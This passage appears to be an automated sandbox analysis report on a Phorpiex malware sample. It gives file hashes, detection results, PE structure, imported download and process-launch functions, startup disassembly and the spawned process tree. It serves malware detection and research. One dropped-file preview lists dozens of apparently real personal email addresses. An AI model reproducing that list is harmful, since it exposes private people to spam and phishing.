                                                                                                                                                                                                                                                                                  Preview:lcabello1234.ac@gmail.com.wilson@chinaconnectmanufacturing.com.au.rangelange@hotmail.com.jasmine.marsh@gscs.org.17488@student.mcc.act.edu.au.ctbrown21@tiftschools.com.alanafisher@gmail.com.genesisvpuno@gmail.com.nienke.miedema@kearn.nl.dinesh2008_mail@yahoo.co.in.sarbylp@gmail.com.jaywhite521@googlemail.com.angela.stojcevska7@hotmail.com.mimmu@dlc.fi.ss.landy@yahoo.com.krystalstark@hotmail.com.ushasree.eddam@tcs.com.fullilovehaleigh@gmail.com.kurniyantip@yahoo.co.id.lauranavolo@gmail.com.alimova.lenara@mail.ru.stephino.crusher.fertelli@gmail.com.rodrigobrazao@gmail.com.dillafadilla29@gmail.com.taniya.wilson@gscs.org.valeg.311@hotmail.com.jozefiakmaciej19@gmail.com.jerricksupnet017@gmail.com.yann.widmer@gmail.com.burak.noa@gmail.com.rv_rox@yahoo.com.r.voronov@bigmir.net.abelsg_venta@outlook.com.stopchoice9977@gmail.com.muhammadridhofirdausi09@gmail.com.chelsse02@gmail.com.s3raspati@gmail.com.sgdellarosa@icloud.com.sawinee.me@hotmail.com.faelcancaonova@hotmail.com.mintlove222@outlook.com
                                                                                                                                                                                                                                                                                  Process:C:\Windows\ sysesvcmw.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):286
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.240828133963292
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:iDQqZEl+rrVp8RGF9yb9eOIcE9KCmlGEmXuwzNSNn3GpSXkH6L:YQq+mrwUyb9fE+mXuwZi3GpS0aL
                                                                                                                                                                                                                                                                                  MD5:6102C5BD0BDB1A4A2994987EA9896BDE
                                                                                                                                                                                                                                                                                  SHA1:41B9F5B1936564FD8BACAB94C88C0392A63E932C
                                                                                                                                                                                                                                                                                  SHA-256:31BF294BC93C712CEC6C70974646A9ACF67D4796CF271DF041D48264674601D5
                                                                                                                                                                                                                                                                                  SHA-512:977C773F95CBDF1B683B6D9B51A60F3ADE71D7A93DFD6D41762B7B4DBAD5A38C8EF262F2F9CC07E8784948E9EEBF0D1A15A5982E5A7E63A44A562A6D34F0EF46
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:..9....h.lJ..."....'<...,......a.q.aHJ....</J..[.X=.c..S..f}z&..Uy.]-.......c..\E....$HLgPj......`.....~........<.."..^bg.A-"....:..Y.%>;..Ssq..f.......p'.ee...[.\...w......7x.e....xT.vA...8.L.%yg....t}.R.?..C.].y.pv...|bdy.c..$.....ke..\[..G.00..g2.a.$].#..7g.DY..R....-..v..1..M.
                                                                                                                                                                                                                                                                                  Process:C:\Windows\ sysesvcmw.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):4096
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.815343893011161
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:+XnjMe/ekLWtoTCn9B67asSW8qo8MPsExp0PEc/SQlBWCqnt:YnjpWtoTs4VSWQFkExpUEc/hWvt
                                                                                                                                                                                                                                                                                  MD5:34A341CC965E8877BCF2C7FF9170C309
                                                                                                                                                                                                                                                                                  SHA1:6853E900D6E19BEC7F424FC29B39834A5A4A98A5
                                                                                                                                                                                                                                                                                  SHA-256:E0DEBCE5B9D11F131B3CF0F3996723AA1B02D8135A71787F0A94F439654423C2
                                                                                                                                                                                                                                                                                  SHA-512:720D9B9C705FA37AFE46D4078EB743A27B34828F68211C4D11F137945D2859B7E2AC34DA52FC89EB2455806D6DD05E17685BEDD0C525BAA1EE79E4D51982E56C
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.].:.).R;[.t.).R\r1..).RYj.:.).R_.+..).R.].&<......<....*g.<....py;<...%...<.....O......y-.....^.F:.............m.............p.".......T......ks....U.K.....Q.rM......................W.............(.......q.....PP......T5.j............z.C......HZ....[b.......D......f.5............m}.q...........^.L....._ks......ppT....Y*-)....Y........Z{....%........O.......(.....<.2............S..\..............o..............Fq.......[......:..............o.....[.........4.....Y.r......z......pi.............^.1.....Rr......^.L.....%..p....>.$.....[.........E......psM....................]{...............O]...._.:.....#j.......{..............w.......y.......cw......}......J@{.......U.......x....[.:...............L....Y.>.....f........":....................%......Y.>.......c......d:\.......X....N&-N....^.Ey....x......m>.........4.......%....%..V.....pa}....f.c......G.n......6F....^.LU....^.......N'.......pk........v.....pqL......m.....)a.9......Vq....R...............mJ.......p{j....
                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\2550821914.exe
                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):80896
                                                                                                                                                                                                                                                                                  Entropy (8bit):6.402141253215905
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:1536:T3Mz8M4xQ21dFtb4Jn6wfpSzSLGcmRfFN8R+eeeeeeeeWeeeee:4wMH2zbb4x6wxTLGcmRfFN8R
                                                                                                                                                                                                                                                                                  MD5:90CBEADCDA0AD6D4302C36AA9FD2A53C
                                                                                                                                                                                                                                                                                  SHA1:72326251A563E16EEEC31D7E1F7BED9D99563246
                                                                                                                                                                                                                                                                                  SHA-256:D2B6791FB169C2C87D9FBC2846525DBBBECEF3BF112259214B1B4DA907D580EF
                                                                                                                                                                                                                                                                                  SHA-512:4B24D4970896A19178B290FF35ECFD6E5DB08B74426992CDB02A0F19D792F92C6230507A376262F77375330E5D8ADEA139C072A29774E915BEDB82840E1BEE76
                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Windows\ sysesvcmw.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 87%
                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]b1..._..._..._.aq^..._......._......._...P..._.>.2..._...^..._.>.$..._..{.>._..{..._.Rich.._.........PE..L......d.....................j.......^............@.........................................................................d!.......................................................................................................................text...\........................... ..`.rdata...0.......2..................@..@.data....6...@...$..................@...................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.258333744893974
                                                                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                  File name:gEkl9O5tiu.exe
                                                                                                                                                                                                                                                                                  File size:9'728 bytes
                                                                                                                                                                                                                                                                                  MD5:2ea6c5e97869622dfe70d2b34daf564e
                                                                                                                                                                                                                                                                                  SHA1:45500603bf8093676b66f056924a71e04793827a
                                                                                                                                                                                                                                                                                  SHA256:5f28bba8bd23cdb5c8a3fa018727bcf365eaf31c06b7bc8d3f3097a85db037f3
                                                                                                                                                                                                                                                                                  SHA512:f8f82b5875e8257206561de22ddbd8b5d9a2393e0da62f57c5a429ca233c7443c34647cc2253cf766bfaaf8177acb5c0627ab2f2418f5968f0a6fdec54244d43
                                                                                                                                                                                                                                                                                  SSDEEP:96:zM4LwN8GXhc1I+a8gnYFdj9DSYp+BYA8v7cVO15uJxGE9YUBz2qh3C7tCE4ecp:AwwNfC1TUYv9p+OF8JxTmUBzthcqp
                                                                                                                                                                                                                                                                                  TLSH:50121A0ABDCA40B0E3A08CF057F58B4A8ABE5063179672DFB7B3C5494F5039184677E5
                                                                                                                                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......gd.##.`p#.`p#.`p*}.p!.`p*}.p".`p*}.p6.`p...p(.`p#.ap..`p*}.p .`p*}.p".`pRich#.`p................PE..L......d...................
                                                                                                                                                                                                                                                                                  Icon Hash:aaf3e3e3918382a0
                                                                                                                                                                                                                                                                                  Entrypoint:0x401729
                                                                                                                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                  Time Stamp:0x64DCD99D [Wed Aug 16 14:13:49 2023 UTC]
                                                                                                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                                                                                                  OS Version Major:5
                                                                                                                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                                                                                                                  File Version Major:5
                                                                                                                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                                                                                                                  Subsystem Version Major:5
                                                                                                                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                  Import Hash:7fda7734b056db13fe95f35927509e47
                                                                                                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                                                                                                  call 00007FBCC0D8D06Fh
                                                                                                                                                                                                                                                                                  jmp 00007FBCC0D8CA2Bh
                                                                                                                                                                                                                                                                                  mov edi, edi
                                                                                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                                                                                                                                  mov eax, dword ptr [ebp+08h]
                                                                                                                                                                                                                                                                                  mov eax, dword ptr [eax]
                                                                                                                                                                                                                                                                                  cmp dword ptr [eax], E06D7363h
                                                                                                                                                                                                                                                                                  jne 00007FBCC0D8CD1Ch
                                                                                                                                                                                                                                                                                  cmp dword ptr [eax+10h], 03h
                                                                                                                                                                                                                                                                                  jne 00007FBCC0D8CD16h
                                                                                                                                                                                                                                                                                  mov eax, dword ptr [eax+14h]
                                                                                                                                                                                                                                                                                  cmp eax, 19930520h
                                                                                                                                                                                                                                                                                  je 00007FBCC0D8CD07h
                                                                                                                                                                                                                                                                                  cmp eax, 19930521h
                                                                                                                                                                                                                                                                                  je 00007FBCC0D8CD00h
                                                                                                                                                                                                                                                                                  cmp eax, 19930522h
                                                                                                                                                                                                                                                                                  je 00007FBCC0D8CCF9h
                                                                                                                                                                                                                                                                                  cmp eax, 01994000h
                                                                                                                                                                                                                                                                                  jne 00007FBCC0D8CCF7h
                                                                                                                                                                                                                                                                                  call 00007FBCC0D8D0C4h
                                                                                                                                                                                                                                                                                  xor eax, eax
                                                                                                                                                                                                                                                                                  pop ebp
                                                                                                                                                                                                                                                                                  retn 0004h
                                                                                                                                                                                                                                                                                  push 00401733h
                                                                                                                                                                                                                                                                                  call dword ptr [00402000h]
                                                                                                                                                                                                                                                                                  xor eax, eax
                                                                                                                                                                                                                                                                                  ret
                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                  jmp dword ptr [004020B4h]
                                                                                                                                                                                                                                                                                  push 00000014h
                                                                                                                                                                                                                                                                                  push 00402430h
                                                                                                                                                                                                                                                                                  call 00007FBCC0D8CF5Bh
                                                                                                                                                                                                                                                                                  push dword ptr [00403384h]
                                                                                                                                                                                                                                                                                  mov esi, dword ptr [0040206Ch]
                                                                                                                                                                                                                                                                                  call esi
                                                                                                                                                                                                                                                                                  pop ecx
                                                                                                                                                                                                                                                                                  mov dword ptr [ebp-1Ch], eax
                                                                                                                                                                                                                                                                                  cmp eax, FFFFFFFFh
                                                                                                                                                                                                                                                                                  jne 00007FBCC0D8CCFEh
                                                                                                                                                                                                                                                                                  push dword ptr [ebp+08h]
                                                                                                                                                                                                                                                                                  call dword ptr [00402068h]
                                                                                                                                                                                                                                                                                  pop ecx
                                                                                                                                                                                                                                                                                  jmp 00007FBCC0D8CD59h
                                                                                                                                                                                                                                                                                  push 00000008h
                                                                                                                                                                                                                                                                                  call 00007FBCC0D8D085h
                                                                                                                                                                                                                                                                                  pop ecx
                                                                                                                                                                                                                                                                                  and dword ptr [ebp-04h], 00000000h
                                                                                                                                                                                                                                                                                  push dword ptr [00403384h]
                                                                                                                                                                                                                                                                                  call esi
                                                                                                                                                                                                                                                                                  mov dword ptr [ebp-1Ch], eax
                                                                                                                                                                                                                                                                                  push dword ptr [00403380h]
                                                                                                                                                                                                                                                                                  call esi
                                                                                                                                                                                                                                                                                  pop ecx
                                                                                                                                                                                                                                                                                  pop ecx
                                                                                                                                                                                                                                                                                  mov dword ptr [ebp-20h], eax
                                                                                                                                                                                                                                                                                  lea eax, dword ptr [ebp-20h]
                                                                                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                                                                                  lea eax, dword ptr [ebp-1Ch]
                                                                                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                                                                                  push dword ptr [ebp+08h]
                                                                                                                                                                                                                                                                                  mov esi, dword ptr [00402060h]
                                                                                                                                                                                                                                                                                  call esi
                                                                                                                                                                                                                                                                                  Programming Language:
                                                                                                                                                                                                                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                  • [ASM] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                  • [IMP] VS2005 build 50727
                                                                                                                                                                                                                                                                                  • [C++] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                  • [LNK] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x246c0x8c.rdata
                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x2b0.rsrc
                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x50000x198.reloc
                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x23a00x40.rdata
                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x104.rdata
                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                                  .text0x10000xc8a0xe00False0.5789620535714286data5.68682135539298IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                  .rdata0x20000xa340xc00False0.4261067708333333data4.355732762946175IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                  .data0x30000x38c0x200False0.060546875data0.35275948821577235IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                  .rsrc0x40000x2b00x400False0.3623046875data5.194459669718395IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                  .reloc0x50000x1fe0x200False0.802734375data5.540041373249554IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                                  RT_MANIFEST0x40580x256ASCII text, with CRLF line terminatorsEnglishUnited States0.5100334448160535
                                                                                                                                                                                                                                                                                  DLLImport
                                                                                                                                                                                                                                                                                  SHLWAPI.dllPathFileExistsW
                                                                                                                                                                                                                                                                                  MSVCR90.dll__set_app_type, ?terminate@@YAXXZ, _unlock, _encode_pointer, _lock, _onexit, _decode_pointer, _except_handler4_common, _invoke_watson, _controlfp_s, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _configthreadlocale, _initterm_e, _initterm, _acmdln, exit, _ismbblead, _XcptFilter, _exit, _cexit, __getmainargs, _amsg_exit, srand, rand, memset, __dllonexit, _crt_debugger_hook
                                                                                                                                                                                                                                                                                  WININET.dllInternetOpenA, InternetOpenUrlA, InternetOpenW, InternetOpenUrlW, InternetReadFile, InternetCloseHandle
                                                                                                                                                                                                                                                                                  urlmon.dllURLDownloadToFileW
                                                                                                                                                                                                                                                                                  KERNEL32.dllSetUnhandledExceptionFilter, GetStartupInfoA, GetTickCount, ExpandEnvironmentStringsW, CreateFileW, WriteFile, CloseHandle, DeleteFileW, CreateProcessW, Sleep, QueryPerformanceCounter, GetCurrentThreadId, GetCurrentProcessId, GetSystemTimeAsFileTime, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, IsDebuggerPresent, InterlockedCompareExchange, InterlockedExchange
                                                                                                                                                                                                                                                                                  USER32.dllwsprintfW
                                                                                                                                                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                                  EnglishUnited States
                                                                                                                                                                                                                                                                                  Report size exceeds maximum size, go to the download page of this report and download PCAP to see all network behavior.

                                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                                  Target ID:1
                                                                                                                                                                                                                                                                                  Start time:14:31:28
                                                                                                                                                                                                                                                                                  Start date:17/08/2023
                                                                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\gEkl9O5tiu.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                  Commandline:C:\Users\user\Desktop\gEkl9O5tiu.exe
                                                                                                                                                                                                                                                                                  Imagebase:0x1090000
                                                                                                                                                                                                                                                                                  File size:9'728 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:2EA6C5E97869622DFE70D2B34DAF564E
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                                                                                                                  Start time:14:31:34
                                                                                                                                                                                                                                                                                  Start date:17/08/2023
                                                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\2550821914.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\2550821914.exe
                                                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                                                  File size:80'896 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:90CBEADCDA0AD6D4302C36AA9FD2A53C
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000004.00000000.370252775.0000000000410000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000004.00000002.381787142.00000000004D3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\AppData\Local\Temp\2550821914.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                                  • Detection: 87%, ReversingLabs
                                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                                                                                                                  Start time:14:31:38
                                                                                                                                                                                                                                                                                  Start date:17/08/2023
                                                                                                                                                                                                                                                                                  Path:C:\Windows\ sysesvcmw.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\ sysesvcmw.exe
                                                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                                                  File size:80'896 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:90CBEADCDA0AD6D4302C36AA9FD2A53C
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000005.00000000.379469431.0000000000410000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Windows\ sysesvcmw.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                                  • Detection: 87%, ReversingLabs
                                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                                                                                                                  Start time:14:31:48
                                                                                                                                                                                                                                                                                  Start date:17/08/2023
                                                                                                                                                                                                                                                                                  Path:C:\Windows\ sysesvcmw.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                  Commandline:"C:\Windows\ sysesvcmw.exe"
                                                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                                                  File size:80'896 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:90CBEADCDA0AD6D4302C36AA9FD2A53C
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000006.00000000.399820477.0000000000410000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                                                                                                  Start time:14:32:51
                                                                                                                                                                                                                                                                                  Start date:17/08/2023
                                                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\1925824589.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\1925824589.exe
                                                                                                                                                                                                                                                                                  Imagebase:0xea0000
                                                                                                                                                                                                                                                                                  File size:17'920 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:4F74BC597A7FA3989EC09EEFA2A3D00A
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                                                                                                                  Start time:14:35:24
                                                                                                                                                                                                                                                                                  Start date:17/08/2023
                                                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\150623101.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\150623101.exe
                                                                                                                                                                                                                                                                                  Imagebase:0x20000
                                                                                                                                                                                                                                                                                  File size:6'656 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:0D539E8277F20391A31BABFF8714FDB0
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                                  • Detection: 92%, ReversingLabs
                                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                                                                                                                  Start time:14:35:31
                                                                                                                                                                                                                                                                                  Start date:17/08/2023
                                                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\2465513676.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\2465513676.exe
                                                                                                                                                                                                                                                                                  Imagebase:0x13f8b0000
                                                                                                                                                                                                                                                                                  File size:5'689'344 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:41AB08C1955FCE44BFD0C76A64D1945A
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                                                                  • Detection: 90%, ReversingLabs
                                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                                                    Execution Coverage:42.8%
                                                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                    Signature Coverage:25%
                                                                                                                                                                                                                                                                                    Total number of Nodes:92
                                                                                                                                                                                                                                                                                    Total number of Limit Nodes:4
